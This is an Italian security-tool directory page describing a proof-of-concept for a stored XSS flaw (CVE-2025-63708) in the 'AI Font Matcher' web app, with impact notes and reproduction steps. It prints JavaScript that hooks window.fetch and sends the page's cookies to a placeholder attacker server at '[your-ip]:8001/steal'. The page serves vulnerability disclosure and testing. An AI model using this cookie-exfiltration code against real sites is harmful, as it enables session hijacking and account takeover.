Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-63708 — Proof-of-concept exploit per CVE-2025-63708, una vulnerabilità XSS memorizzata in AI Font Matcher. Dimostra il furto di cookie di sessione tramite nomi di font family non sanificati nelle risposte di fetch dei webfonts. | Kitploit
Strumenti/GitHubGitHub/dylandavis1/cve-2025-63708
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Proof-of-concept exploit per CVE-2025-63708, una vulnerabilità XSS memorizzata in AI Font Matcher. Dimostra il furto di cookie di sessione tramite nomi di font family non sanificati nelle risposte di fetch dei webfonts.

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-63708

ID CVE: CVE-2025-63708
Assegnato: 11-12-2025 Tipo di problema: CWE-79 (Cross-Site Scripting)
Prodotto affetto: "AI Font Matcher" (pubblicato il 10-10-2025, nid=18425)
Pagina del prodotto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Data di scoperta: 11-10-2025
Ricercatore: Dylan Davis

Riepilogo

L'applicazione elabora i dati provenienti da un fetch di webfonts senza sanificare i nomi delle famiglie di font. Un attaccante che controlla o intercetta quella risposta può iniettare JavaScript che viene eseguito nel contesto della pagina, consentendo il furto di cookie di sessione e l'acquisizione dell'account.

Impatto

  • Esecuzione arbitraria di JavaScript nel browser della vittima
  • Esfiltrazione dei cookie di sessione (durante i test ho osservato cookie non HttpOnly)
  • Dirottamento dell'account e azioni eseguite per conto dell'utente

Versioni / Ambito interessati

  • Il pacchetto "AI Font Matcher" distribuito su SourceCodester a partire dal 10-10-2025.

Riproduzione (PoC)

Questo PoC dimostra l'esecuzione di codice agganciando window.fetch e restituendo un payload controllato di Web Fonts.

  1. Esegui l'app localmente dal codice scaricato.
  2. Apri DevTools → Console e incolla il PoC qui sotto (oppure carica poc.js).
  3. Attiva l'interfaccia che recupera webfonts; osserva un alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Esfiltra il cookie verso il tuo server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Esfiltrazione fallita:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Scarica lo strumento